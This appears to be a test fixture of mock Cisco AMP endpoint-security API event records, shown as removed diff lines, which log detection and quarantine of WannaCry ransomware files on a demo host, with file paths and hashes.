Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
